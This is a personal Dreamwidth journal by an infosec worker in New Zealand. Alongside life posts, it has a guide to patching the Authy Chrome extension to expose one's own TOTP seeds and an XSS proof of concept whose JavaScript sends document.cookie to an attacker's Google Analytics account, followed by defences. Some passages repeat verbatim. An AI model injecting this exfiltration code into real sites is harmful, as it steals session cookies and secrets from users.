![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
Twitter implosion
Nov. 18th, 2022 05:07 pmOh hai, I guess dreamwidth is still a thing!
This is a quick hack to the Chrome Authy (version 2.5.0_1) extension (gaedmjdfmmahhbjefcbgaolhhanlaolb) https://chrome.google.com/webstore/detail/authy/gaedmjdfmmahhbjefcbgaolhhanlaolb?hl=en that will let you copy out your TOTP secret seeds. This is based off an existing blog post at https://www.pommepause.com/2014/10/how-to-extract-your-totp-secrets-from-authy/
Note that the secret seed is the "secret" that is used to generate the TOTP rolling code, so make sure you store it somewhere safe that is also encrypted, as anyone with this secret can generate TOTP tokens for whatever account this is for. I would suggest in a separate keepass database stored on a USB drive (bitlockered or Veracrypt) that you either keep on your keyring or in a safe.
Note that the secret seed is the "secret" that is used to generate the TOTP rolling code, so make sure you store it somewhere safe that is also encrypted, as anyone with this secret can generate TOTP tokens for whatever account this is for. I would suggest in a separate keepass database stored on a USB drive (bitlockered or Veracrypt) that you either keep on your keyring or in a safe.
Find where Chrome stores extensions for your OS:
Windows: C:\Users\<Your_User_Name>\AppData\Local\Google\Chrome\User Data\Default\Extensions
Linux: ~/.config/google-chrome/Default/Extensions/
OS X: ~/Library/Application\ Support/Google/Chrome/Default/Extensions
The authy extension will be in the gaedmjdfmmahhbjefcbgaolhhanlaolb directory and the "app.js" file we want to modify is under that, in the version number/js/. (2.5.0_1 as of 2018-01-24)
MAKE SURE YOU TAKE A BACKUP of app.js, in case something goes wrong or you want to restore the default app behaviour.
Open app.js in your favourite javascript IDE and beautify the code. (In Visual Studio Code, this is Alt-Shift-F)
Find the lines:
}, d.prototype.getOtp = function () {
return this.isEncrypted() ? "------" : this.otpGenerator.getOtp(this.decryptedSeed, this.digits)
and paste in the following lines below the above:
}, d.prototype.getSharedSecret = function() {
return this.isEncrypted() ? "?" : this.decryptedSeed
This will get the shared secret from an account.
Find the lines:
}), f(".copy").click(function (t) {
var n, r, o;
return n = f(this), o = function () {
return n.text("Copy")
}, r = n.parent().find(".tokenCodeString")[0], e.onCopyClicked(r), n.text("Copied"), setTimeout(o, 1e3)
and paste in the following lines below the above:
}), f(".copysecret").click(function (t) {
var n, r, o;
return n = f(this), o = function () {
return n.text("Copy Secret")
}, r = n.parent().find(".sharedSecret")[0], e.onCopyClicked(r), n.text("Copied secret"), setTimeout(o, 1e3)
Here we're adding a function to copy the secret to the clipboard when you click the "copy secret" button.
Next find:
}, TokensView.prototype.updateTokens = function (t) {
var e, r, o, i, s, a;
for (s = [], o = 0, i = t.length; o < i; o++) a = t[o], r = f(a), e = n.get().find(r.attr("data-token-id")), r.find(".tokenCode").html(e.formatToken()(e.getOtp())), s.push(r.find(".tokenCodeString").html(e.getOtp()));
and add:
for (s = [], o = 0, i = t.length; o < i; o++) a = t[o], r = f(a), e = n.get().find(r.attr("data-token-id")), r.find(".sharedSecret").html(e.formatToken()(e.getSharedSecret())), s.push(r.find(".sharedSecret").html(e.getSharedSecret()));
right underneath the for loop, but before "return s"
This finds the shared secret and displays it.
Lastly is the messy HTML bit: (Turn on word wrap for this)
Find "t.exports = '<div class="tokens-screen">\n\n {{> navbar}}\n\n {{> tokens_navbar}}\n\n <div id="tokens-view" class="container">\n {{#apps}}\n {{! This will be rendered if the app is decrypted}}\n"
Find "<span class="tokenCodeString">{{ getOtp }}</span>\n" and immediately after this paste in: "<br><span class="sharedSecret">{{ getSharedSecret }}</span>\n"
Then find the line that has "<button class="button-copy copy">Copy</button>\n" and add immediately after the \n but before the "</div>" the following:
"<button class="button-copy copysecret">Copy secret</button>\n"
This adds the "Copy secret" button, which will copy the secret to the clipboard when clicked.
Finally save this, close the authy extension window and reopen it.
A gist with the diff is available: https://gist.github.com/kyhwana/bdbbc35532d264143dcbe00e07b2c461
So I was inspired after reading https://www.reddit.com/r/btc/comments/7dsmvd/my_analysis_of_the_1_million_usd_mybtgwalletcom/ where someone modified the javascript source of a bitcoin wallet to send user secrets to the attackers Google Analytics account and I figured I should see if this was actually possible. It turns out that yes, yes you can.
The requirement for this attack is that you can get the client browser to execute some javascript. In most cases this would be via XSS, modifying the website javascript in some way or uploading a javascript file that you can get included and executed (Usually via XSS, if you can't get the server or client to fetch your javascript for you)
Given that we need XSS or some kind of MITM/modification of source files, you might ask "Why would we use Google Analytics for exfil"?
Well, if the client/server isn't blocking Google Analytics, anyone looking at IDS/DNS log files will see a normal GA connection (Protected by HTTPS!) and think nothing of it. It's a sneaky way of exfilling data out, that before the btg wallet hack, I had not seen before.
Lets get started!
First of all you need a GA account. This is easy, google will give you one for free.
Create a Custom Dimension as specified here: https://developers.google.com/analytics/devguides/collection/gtagjs/custom-dims-mets
This will let us set a variable to anything we want (Such as cookies that javascript can access or any other javascript variable) and have it sent to GA.
Create a custom report:
We host or upload our GA javascript somewhere:
Insert via XSS (Reflected or Stored works) and here you can see our GA cookie and some javascript variables being sent to GA (I used DVWA locally to XSS)
and here is the GA dashboard showing our secrets, including the DVWA PHP session ID.
So how do you protect against this?
Find and fix all the XSS or remote/local file inclusion vulnerabilities.
Ad/tracking blockers on the client side that block Google Analytics will stop this from being exploited on the client side. On a corporate network, block the GA hosts at a network or endpoint level.
Set your cookies http_only, so that javascript can't access them.
The requirement for this attack is that you can get the client browser to execute some javascript. In most cases this would be via XSS, modifying the website javascript in some way or uploading a javascript file that you can get included and executed (Usually via XSS, if you can't get the server or client to fetch your javascript for you)
Given that we need XSS or some kind of MITM/modification of source files, you might ask "Why would we use Google Analytics for exfil"?
Well, if the client/server isn't blocking Google Analytics, anyone looking at IDS/DNS log files will see a normal GA connection (Protected by HTTPS!) and think nothing of it. It's a sneaky way of exfilling data out, that before the btg wallet hack, I had not seen before.
Lets get started!
First of all you need a GA account. This is easy, google will give you one for free.
Create a Custom Dimension as specified here: https://developers.google.com/analytics/devguides/collection/gtagjs/custom-dims-mets
This will let us set a variable to anything we want (Such as cookies that javascript can access or any other javascript variable) and have it sent to GA.
Create a custom report:
We host or upload our GA javascript somewhere:
document.write('');
var secrets='totes javascripts secrets PoC here';
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-ID-2',{'custom_map': {'dimension2': 'pass'}});
gtag('event', 'pass_dimension' , {'pass': document.cookie+' '+secrets});
Insert via XSS (Reflected or Stored works) and here you can see our GA cookie and some javascript variables being sent to GA (I used DVWA locally to XSS)
and here is the GA dashboard showing our secrets, including the DVWA PHP session ID.
So how do you protect against this?
Find and fix all the XSS or remote/local file inclusion vulnerabilities.
Ad/tracking blockers on the client side that block Google Analytics will stop this from being exploited on the client side. On a corporate network, block the GA hosts at a network or endpoint level.
Set your cookies http_only, so that javascript can't access them.
Shutting down LJ
Apr. 4th, 2017 05:00 pmWelp, with the new TOS update, (Section 9.2.8) you can't be the LGBTQ or post anything about the LGBTQ's on LJ, so importing everything to DW and then deleting all the posts except this one.
http://www.livejournal.com/legal/tos-en.bml
(Remember, it's basically illegal to be LGBTQ or talk about it favourably in any way
http://www.livejournal.com/legal/tos-en.bml
(Remember, it's basically illegal to be LGBTQ or talk about it favourably in any way
Still alive!
Nov. 11th, 2016 10:50 pmOh hey, it's been almost 2 years since my last post. *looks at last post* Oh shit.
Well, In those two years i've gone through 2 jobs (both infosec related) and am currently funemployed in Wellington NZ.
Posting here because i've just randomly going through old Rick Emerson things from when I was living in Portland, OR, given the current events in the US. x.x
Well, In those two years i've gone through 2 jobs (both infosec related) and am currently funemployed in Wellington NZ.
Posting here because i've just randomly going through old Rick Emerson things from when I was living in Portland, OR, given the current events in the US. x.x
So it turns out that Cyanogenmod's updater uses http and is vulnerable to MITM attacks.
If you use Cyanogenmod, read the above and don't use the built in updater!
If you use Cyanogenmod, read the above and don't use the built in updater!
FurcoNZ 2014
Feb. 10th, 2014 10:21 pmOhh, a post!
Spent the last few days down south at a scout campsite outside of Wellington, with no cell reception with a bunch of NZ furs.
Besides the rain and being tired from lack of sleep, a good time was had! Just what I needed as a chance to get away from technology for a few days.
Got new job starting near the end of this month, been at the old one for nearly six years and and the whole being bought out by a big US company and a few other things there are making it kinda meh, so should be a good change..
Living in Auckland with lyctiger now, other than those two changes, not much has been going on I guess! Still single/kinda looking but not, need to cut my mullet hair (again), got lots of shineys to play with..
Spent the last few days down south at a scout campsite outside of Wellington, with no cell reception with a bunch of NZ furs.
Besides the rain and being tired from lack of sleep, a good time was had! Just what I needed as a chance to get away from technology for a few days.
Got new job starting near the end of this month, been at the old one for nearly six years and and the whole being bought out by a big US company and a few other things there are making it kinda meh, so should be a good change..
Living in Auckland with lyctiger now, other than those two changes, not much has been going on I guess! Still single/kinda looking but not, need to cut my mullet hair (again), got lots of shineys to play with..
WTF religion vs women.
Dec. 29th, 2012 11:38 pmhttp://www.sbs.com.au/news/article/1723242/Women-bring-violence-on-themselves-priest
So, according to this Catholic Priest, women bring rape on themselves...
"How often do we see girls and mature women going around scantily dressed and in provocative clothes?" Piero Corsi said in a Christmas message posted on the door of his church in the small town of San Terenzio in northwest Italy.
"They provoke the worst instincts, which end in violence or sexual abuse. They should search their consciences and ask: did we bring this on ourselves?" it read.
"The fact is that women are increasingly provocative, they become arrogant, they believe themselves to be self-sufficient and end up exacerbating the situation," he said.
"Are women themselves not causing harm by unveiling themselves like this?"
Replace girls/women with boys/men, then see how that sounds!
You're a goddam sentient being, how about not acting on "worst instincts" and simply NOT RAPING PEOPLE.
They didn't fucking bring this on themselves, another (male) sentient being CHOSE to violate another being!
I can only assume this priest is a hypocrite like the rest of them and is actually dicking some young boys on side and then spouting this crap.
Women are provocative?! They are and can be self-sufficient! They have the right to do so!
If you think that other sentient beings don't deserve the right to self-determination, then you need to look at yourself and hey, maybe YOU don't deserve the right to determine your own destiny.
So, according to this Catholic Priest, women bring rape on themselves...
"How often do we see girls and mature women going around scantily dressed and in provocative clothes?" Piero Corsi said in a Christmas message posted on the door of his church in the small town of San Terenzio in northwest Italy.
"They provoke the worst instincts, which end in violence or sexual abuse. They should search their consciences and ask: did we bring this on ourselves?" it read.
"The fact is that women are increasingly provocative, they become arrogant, they believe themselves to be self-sufficient and end up exacerbating the situation," he said.
"Are women themselves not causing harm by unveiling themselves like this?"
Replace girls/women with boys/men, then see how that sounds!
You're a goddam sentient being, how about not acting on "worst instincts" and simply NOT RAPING PEOPLE.
They didn't fucking bring this on themselves, another (male) sentient being CHOSE to violate another being!
I can only assume this priest is a hypocrite like the rest of them and is actually dicking some young boys on side and then spouting this crap.
Women are provocative?! They are and can be self-sufficient! They have the right to do so!
If you think that other sentient beings don't deserve the right to self-determination, then you need to look at yourself and hey, maybe YOU don't deserve the right to determine your own destiny.
(no subject)
Oct. 16th, 2012 09:06 pmWow, it's been over a year since I posted here.
Still alive! Doing OKish, it's spring now, so omgpollenfuckingmysinuses.
Still alive! Doing OKish, it's spring now, so omgpollenfuckingmysinuses.
Earthquakes
Feb. 22nd, 2011 08:59 pmAnother Earthquake in New Zealand. I'm OK, again it was another quake in Christchurch, no where near me.
But this one was worse than the last one, despite being a 6.3 (The last one in September was 7.1) but only 5km depth, 10km outside of Christchurch.
Fortuantly i've heard from my family and friends in Christchurch, they're all OK.
But this one was worse than the last one, despite being a 6.3 (The last one in September was 7.1) but only 5km depth, 10km outside of Christchurch.
Fortuantly i've heard from my family and friends in Christchurch, they're all OK.
(no subject)
Jan. 27th, 2011 10:06 pmOh Hai LJ.
Meme time!
"Movies you would watch while drunk, then have sex to after watching still while drunk."
I think the only movie i've done this to is Spaceballs XD
Meme time!
"Movies you would watch while drunk, then have sex to after watching still while drunk."
I think the only movie i've done this to is Spaceballs XD
FurcoNZ 2010 review
Dec. 17th, 2010 11:56 pmQuick furconz review:
- Managed to take lots of anti-histamines. I think I ended up halucinating once or twice. The sunglasses I wore most of the time helped with my eyes a bit!
- Didn't get drunk. Woo.
- Food was good. Ended up with sirlion steak, spaghetti bolagnase, mild chicken curry for dinners. Sandwiches etc for lunches and some stuff I forget for breakfast.
- Hookahs are awesome. Depressed people getting drunk and trying to steal booze, me twinging my shoulder trying to keep them from stealing said booze is not. DRAMA.
- Went kayaking and on a ~4 hour hike. Those were awesome.
- Redtail decided to rope a bunch of people into building a raft using 2x4s and 40 gallon barrels to make a raft in the pool below the water falls as fun to watch.
- Managed not to get sunburnt, applied lots of sunscreen!
- Singstar was fun, Sunday night.
- Spent Friday running around before the con picking stuff up, loading stuff etc. Again, had lots of time to setup Friday evening. Stood around for a few hours waiting till the 'con opened XD
- RAGE BEATLES. Damn huhu grubs.
- Picked up some thinkgeek shirts at the 'con. The XKCD "Im about to do SCIENCE" shirt and a "cd /pub" shirt. Also picked up some commisions. (below)
- Saw a whole bunch of people I hadn't seen since last year! Good to see you all again. Hopefully will get to see some of you again before next years. XD
- Was completely wiped out Monday/tuesday! I ended up having muscle lag, I would go to move a limb and it would take a second for said limbs to move. That was weird.
Stats:
- Managed to take lots of anti-histamines. I think I ended up halucinating once or twice. The sunglasses I wore most of the time helped with my eyes a bit!
- Didn't get drunk. Woo.
- Food was good. Ended up with sirlion steak, spaghetti bolagnase, mild chicken curry for dinners. Sandwiches etc for lunches and some stuff I forget for breakfast.
- Hookahs are awesome. Depressed people getting drunk and trying to steal booze, me twinging my shoulder trying to keep them from stealing said booze is not. DRAMA.
- Went kayaking and on a ~4 hour hike. Those were awesome.
- Redtail decided to rope a bunch of people into building a raft using 2x4s and 40 gallon barrels to make a raft in the pool below the water falls as fun to watch.
- Managed not to get sunburnt, applied lots of sunscreen!
- Singstar was fun, Sunday night.
- Spent Friday running around before the con picking stuff up, loading stuff etc. Again, had lots of time to setup Friday evening. Stood around for a few hours waiting till the 'con opened XD
- RAGE BEATLES. Damn huhu grubs.
- Picked up some thinkgeek shirts at the 'con. The XKCD "Im about to do SCIENCE" shirt and a "cd /pub" shirt. Also picked up some commisions. (below)
- Saw a whole bunch of people I hadn't seen since last year! Good to see you all again. Hopefully will get to see some of you again before next years. XD
- Was completely wiped out Monday/tuesday! I ended up having muscle lag, I would go to move a limb and it would take a second for said limbs to move. That was weird.
Stats:
Final attendance: 66 Full registrations (staying at the Lodge over the weekend): 65 Day passes: 1 And more even more statistics: Oldest attendee: 43 years old Youngest attendee: 16 years old Average age of our attendees: 25 years old Male attendees: 53 Female attendees: 13
 |
| From Phone |
(no subject)
Dec. 5th, 2010 06:57 pmMah new license plat surround:  |
Just because I like to screw with people.. Also apparently FA admins close down journal entries that "harass christians". pfft, whatever. Lame. |
(no subject)
Nov. 16th, 2010 06:34 pmOhh look! New Ian M Banks novel is out!
Surface Detail.. There's even a kindle version, yay!
Ohwait.
Not avaliable in my location? The ELECTRONIC VERSION??
FAIL!
*pirates instead*
Surface Detail.. There's even a kindle version, yay!
Ohwait.
Not avaliable in my location? The ELECTRONIC VERSION??
FAIL!
*pirates instead*
